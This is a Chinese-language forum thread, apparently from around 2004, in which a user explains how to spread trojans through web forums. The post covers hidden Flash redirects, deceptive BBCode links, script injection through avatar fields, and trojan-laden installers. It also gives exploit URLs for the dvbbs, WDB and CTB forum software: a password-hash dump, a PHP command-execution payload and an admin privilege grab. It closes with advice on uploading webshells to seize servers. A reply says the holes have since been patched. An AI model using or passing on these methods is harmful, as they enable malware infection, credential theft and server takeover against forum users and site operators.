|
 | 作者: shuishi [shuishi]
 论坛用户 |
登录 |
| 发木马的一些方法 我来讲下我发木马的方法,其实很简单只要细心大家都可以的,本机下和直接发网址的我就不说了太简单了,主要说说论坛 首先找1个论坛,第一当然是看能不能放FLASH,能放的话就用FLASH跳转,代码就要看论坛帮助了,一般都放个1,1的,别人看不到 如果别人打开这个有FLASH的帖子就会跳转到指定的网页,随便什么网页都可以。(后面有做跳转的方法) 如果FLASH被禁止了(大点的游戏论坛基本都是,被我们搞怕了),那就看论坛是什么脚本写的了,如果是PHP的那就很难做手脚了, 不过看看帮助里面的VB代码,你会发现所有的论坛多有和[u-r-l=http://www.chinavbb.com]点这里访问紫桐社区[/u-r-l]类似的代码,嘿嘿~~~ 搞个小欺骗,[u-r-l=http://你要发的网址]http://163.com[/u-r-l]发到论坛以后就会出现http://163.com但是别人点开以后确是你的网址 我只是提示一下,具体怎么用大家就自己想。(使用时把-去掉,如果自己怕被别人骗可以把鼠标放在网址上面不点,状态栏会出现真实地址) 如果是ASP的,先看看有没有自定义头像,如果有就先在里面用上window.open的代码,如果成功也会打开你想要的网址,如果出现的是代码 那么就是打过补丁的了(不过我试了很多,好象打这种补丁的很少,试了10几个论坛全部成功),上面那种小欺骗当然也可以用,就是太被 动了。 还可以做个安装包,把木马和其他的程序做在一起,设定安装的时候运行木马,安装完毕以后就删除,具体怎么用就看自己了。 特别发几个论坛的漏洞: 1,dvbbs:tongji.asp?orders=2&N=?%20userpassword,可以直接看到MD5加密后的密码?=你想查看的数量N=1就是看1个,N=2就是看2个 然后用COOKIES欺骗,拿到管理员权限。 2,WDB:announcesys.php?job=write&announceadmin=1&content=内容&title=标题&step=2&menbern=<?%20system($cmd);?> 打上你要发的内容和标题然后提交,就可以在WDB的论坛直接发公告,每个版都是置顶的。 3,CTB:admin/main.php?mod=systemuser&systemUserName=用户名&systemUserMode=1&action=addSystemUser提交以后可以在CTB论坛 直接把自己提升成超管。 PS:如果你有一定的技术,在拿到论坛管理员权限进了后台以后,可以修改上传文件类型,传上ASP或者PHP木马,就有可能拿到整个服 务器的权限,就看服务器权限支不支持(经我测试,大部分都可以)运气好1个服务器上都会有很多网站,加个代码在网页上,就等信吧 最好不用163的信箱,他有500封的限制,3,4个小时就到了,到了520封左右就不收信了,推存用ELONG的。不过不懂的最好别动整个服务 器,很容易被抓到的,那可不是网吧的网管。 FLASH跳转的做法: 1,随便做个东西,双击任何1帧。 2,在帧动作里面选取“获得URL”(E文版“GET URL”) 3,在URL里写入你要跳转的地址 4,输出为SWF文件 在线破解网吧的网站: http://www.cy07.com 如果有技术,自己做就最好了 |
| 地主 发表时间: 04-02-17 22:29 |
 | 回复: zybzc [zybzc]  论坛用户 |
登录 |
|
出来很久了 该补的都补了 现在的论坛很少有这种漏洞存在了 |
| B1层 发表时间: 04-02-17 23:15 |
| 回复: newmyth21 [newmyth21]  论坛用户 |
登录 |
  |
| B2层 发表时间: 04-02-18 08:00 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: [转贴][转贴]发木马的一些方法~~好东西大家分享[转贴][转贴]